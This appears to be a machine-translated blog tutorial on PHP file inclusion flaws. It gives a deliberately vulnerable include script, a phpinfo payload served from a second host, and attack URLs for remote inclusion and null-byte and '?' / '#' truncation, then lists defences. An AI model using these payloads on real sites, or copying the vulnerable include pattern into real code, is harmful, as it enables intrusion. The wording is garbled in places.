当前位置:网站首页>File contains vulnerabilities (II)
File contains vulnerabilities (II)
2022-07-02 05:45:00 【A τθ】
One 、 Contains remote files
1、 Principle analysis
When the remote file is opened , It can include remote files to execute locally . When allow_url_fopen=On、allow_url_include=ON Two conditions at the same time
by On Allow remote inclusion of files .
2、 Practice
2.1 Virtual machine building test.php
<?php
include $_GET['file'];
?>
2.2 python Set up resume server locally
<?php
phpinfo();
?>
C:\Users\Administrator
2.3 The remote file contains
http://192.168.127.132/test.php?file=http://192.168.1.107:8089/1.txt
Two 、 The file contains a truncation attack
The file contains a truncation attack , stay php Version less than 5.3.4 Allow to use %00 truncation , In the use of include And other files contain functions , You can truncate the file name ,
Truncation will be affected by gpc influence , If gpc by On when ,%00 Will be converted into \0 Truncation will fail .
<?php
include $GET['file'].'.php';
?>
Pass in file File name concatenation .php In use include The introduction of the file .file Controllable parameters will cause loopholes .
1、 File contains %00 truncation
Upload files with malicious code to the website directory , Include import and then 00 truncation .
The current test version is php 5.2.17,gpc=off
http://192.168.127.132/test.php?file=1.jpg%00
2、 Remote include truncation
2.1 Principle analysis
Characters suitable for remote truncation are :
| Symbol | URL code |
|---|---|
| # | %23 |
| ? | %3f |
| 00 | %00 |
All the above characters can be truncated :
allow_url_fopen =On
allow_url_include=On
2.2 Environment building
<?php
include $_GET['file'];
?>
2.3 python Set up resume server locally
<?php
phpinfo();
?>
C:\Users\Administrator
2.4 The remote file contains
http://192.168.127.132/test.php?file=http://192.168.1.107:8089/1.txt%00
http://192.168.127.132/test.php?file=http://192.168.1.107:8089/1.txt%3f
http://192.168.127.132/test.php?file=http://192.168.1.107:8089/1.txt%23
3、 ... and 、 Defense plan
1. Strictly judge whether the included parameters are externally controllable , Because the key to successful exploitation of file containing vulnerabilities lies in whether the contained files can be controlled externally ;
2. Path restrictions : Restrict contained files to only one file , Be sure to prohibit directory jump characters , Such as :"../";
3. Include file validation : Verify that the included file is a member of the whitelist ;
4. Try not to use dynamic inclusion , It can be fixed on the page to be included , Such as :include('head.php').
5. Set up allow_url_include by Off
边栏推荐
猜你喜欢
Fabric. JS right click menu
idea開發工具常用的插件合集匯總
3D printer G code command: complete list and tutorial
VSCode paste image插件保存图片路径设置
![Gee series: unit 10 creating a graphical user interface using Google Earth engine [GUI development]](/img/78/a17034d4b77d5c0dbe741f84a8ecd7.jpg)
Gee series: unit 10 creating a graphical user interface using Google Earth engine [GUI development]
Storage of data
数理统计与机器学习
记录sentry的踩坑之路
Fabric. JS iText set italics manually
Fabric. JS centered element
随机推荐
GRBL 软件:简单解释的基础知识
Principle and implementation of parallax effect
测试 - 用例篇
Fabric. JS gradient
Gee series: Unit 5 remote sensing image preprocessing [GEE grid preprocessing]
Taskbar explicit / implicit toggle function
Gee series: unit 10 creating a graphical user interface using Google Earth engine [GUI development]
【LeetCode】Day92-盛最多水的容器
Sliding window on the learning road
Grbl software: basic knowledge of simple explanation
centos8安装mysql8.0.22教程
在线音乐播放器app
460. LFU cache bidirectional linked list
【技术随记-08】
Financial portal related information
正则表达式总结
【論文翻譯】GCNet: Non-local Networks Meet Squeeze-Excitation Networks and Beyond
Youth training camp -- database operation project
Record sentry's path of stepping on the pit
青训营--数据库实操项目